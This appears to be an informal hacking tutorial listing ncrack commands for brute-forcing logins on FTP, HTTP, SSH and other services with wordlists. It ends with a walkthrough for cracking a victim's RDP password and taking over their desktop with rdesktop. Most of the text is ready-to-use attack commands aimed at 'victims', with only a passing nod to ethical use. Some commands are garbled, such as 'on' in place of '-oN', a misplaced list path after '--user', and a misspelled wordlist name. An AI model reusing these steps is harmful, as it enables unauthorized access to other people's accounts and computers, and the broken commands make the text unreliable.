It is also a very powerful tool of kali Linux that is attack on different services like ftp, udp, tcp, mysql, etc. of website. It work same hydra and medusa for brute force attack. We can also perform the brute force attack on (login page) of website to finds it username and password by ncrack. It is very best tool like hydra so, a hacker must lean it completely it is pre- installed in new version of kali Linux so we can use it directly.
Now we will discuss the main commands of ncrack for brute force attack on different services of website.
TO SEE ALL OPTIONS OF NCRACK:
(ncrack –h)
TO SIMPLE BRUTE FORCE ATTACK ON ANY SERVICE OF WEBSITE:
(ncrack +service://+ ip address of web) e.g.
(ncrack ftp://192.168.1.0)
TO DO AN ATTACK USING USERNAME LIST AND PASSWORD LIST:
(ncrack -U + path of username list -P + path of password list + link of website:+ port of service to attack) e.g.
(ncrack -U /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:80)
Brute force attack using ncrack
TO DO AN ATTACK ON SERVICE IF USERNAME IS KNOW:
(ncrack --user + path of username list -P + path of password list + ip address of website:+ port of service to attack) e.g.
(ncrack --user admin /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:2424)
FOR DEFALT PAIRWISE ATTACK:
(ncrack -v --pairwise + ip: + port) e.g.
(ncrack -v --pairwise 192.168.1.1:80)
TO STOP NCRACK SOON AFTER FINDING USERNAME AND PASSWORD:
(ncrack -U +path of username list -P +path of password list +ip address:+port of service -f) e.g.
(ncrack -U /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:80 -f)
TO SAVE OUTPUT USERNAME AND PASSWORD IN FILE:
(ncrack -U + path of username list -P + path of password list + ip address:+ port -oN + path of file to save) e.g.
(ncrack -U /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:80 on /root/Desktop/output.txt)
FOR INSANE ATTACK OR POWERFUL ATTACK:
(ncrack -U +path of username list -P +path of password list +ip address of website -T5) e.g.
(ncrack -U /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:21 -T5)
FOR AGGRESSIVE ATTACK:
(ncrack -U + path of username list -P + path of password list + ip address of website:+ port number -T4) e.g.
(ncrack -U /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:22 -T4)
TO SEE DETAIL DURING ATTACK:
(ncrack --user +path of username list -P +path of password list +ip address :+ port -v) e.g.
(ncrack -U /root/Desktop/users.txt -P /root/Desktop/pass.txt 192.168.1.0:24 -v)
TO USE COMMA-SEPRATED USERNAME AND PASSWORD LISTS:
(ncrack --user +path of username list --pass +path of password list +ip address :+port -T5) e.g.
(ncrack --user /root/Desktop/users.txt --pass /root/Desktop/pass.txt 192.168.1.0:81 –T5)
These were some important commands to brute force different services of website by ncrack. You ca use many other useful option in your commands for strong attack also. But you must use important option only.
SYSTEM ATTACK BY NCRACK:
You can use ncrack to find the system (login username and password) also. You can control the (desktop) of your victim’s computer. But you must know the (username) of your victim. To do this run the following commands;
(ncrack -user + username -P+ path of password list rdp://+ ip address -T5) e.g.
(ncrack --user 123 -P /usr/share/wordlists/rokyou.txt rdp://192.168.1.0 -T5)
After running this command you will find a password. Now to access run the following commands;
(rdesktop -u + username + ip of target) e.g.
(rdesktop -u 123 192.168.8.1)
As you will press (Enter) then Desktop of your victim will open and (Enter) (password) and you can use of control the desktop of your victim PC. It was the main detail about ncrack to use for brute force attack. It is similar to hydra. So, you must try it for website attacks, service attack etc. for ethical purpose. So best of luck for NCRACK.